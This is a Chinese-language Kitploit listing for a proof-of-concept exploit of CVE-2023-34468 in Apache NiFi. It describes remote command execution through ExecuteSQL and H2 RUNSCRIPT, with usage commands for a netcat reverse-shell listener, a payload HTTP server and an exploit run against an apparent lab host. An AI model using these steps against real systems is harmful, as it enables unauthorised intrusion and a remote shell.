Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-34468 — CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC | Kitploit
工具/GitHubGitHub/ozcanpng/cve-2023-34468
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队Payload 开发
GitHubozcanpng/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

查看仓库
31个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-34468 — Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

一个简短的 Python PoC,用于滥用可编辑的 Apache NiFi ExecuteSQL 处理器,通过 H2 RUNSCRIPT 负载触发远程命令执行,并通过 Bash 反向 shell 建立连接。

仅用于授权测试和研究。请勿对你不拥有或未经明确许可测试的系统使用。


功能

root@kitploit:~
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
  1. 自动发现单个 ExecuteSQL 处理器,或手动接受 --processor-id。
  2. 写入一个本地 rce.sql 负载,该负载定义并调用一个基于 Java 的 shell 执行别名。
  3. 提示你启动自己的 nc 监听器和 HTTP 服务器。
  4. 更新处理器查询,通过 H2 RUNSCRIPT 获取 rce.sql。
  5. 启动处理器以触发反向 shell。
  6. 在你确认 shell 已建立后,恢复原始的处理器配置。

截图

1. 设置

下载工具

设置

2. 向负载发起请求

利用运行

3. 已收到 Shell

处理器更新

4. 结果

结果


安装

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2023-34468.git
cd CVE-2023-34468
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

用法

终端 1:

root@kitploit:~
rlwrap nc -lvnp 4444

终端 2(在此仓库目录下):

root@kitploit:~
python3 -m http.server 8000

终端 3:

root@kitploit:~
python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444

手动选择处理器:

root@kitploit:~
python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444

影响范围

产品受影响版本所需访问权限影响
Apache NiFi使用了可编辑 ExecuteSQL/H2 行为的受 CVE-2023-34468 影响的部署能够通过 API 访问并修改目标 NiFi 处理器远程命令执行

注意事项

  • 该脚本假定 NiFi API 可访问,且当前用户/会话可以修改目标处理器。
  • 生成的 rce.sql 文件被 git 忽略,应通过 python3 -m http.server 从仓库目录提供。
  • 如果自动发现找不到处理器或找到多个候选处理器,请使用 --processor-id 手动传入处理器 UUID。
  • 在你确认 shell 已建立后,脚本会尝试恢复原始的 ExecuteSQL 处理器配置。

参考

  • NVD — CVE-2023-34468
  • Apache NiFi
  • H2 数据库命令

作者

ozcanpng — github.com/ozcanpng — ozcanpng.dev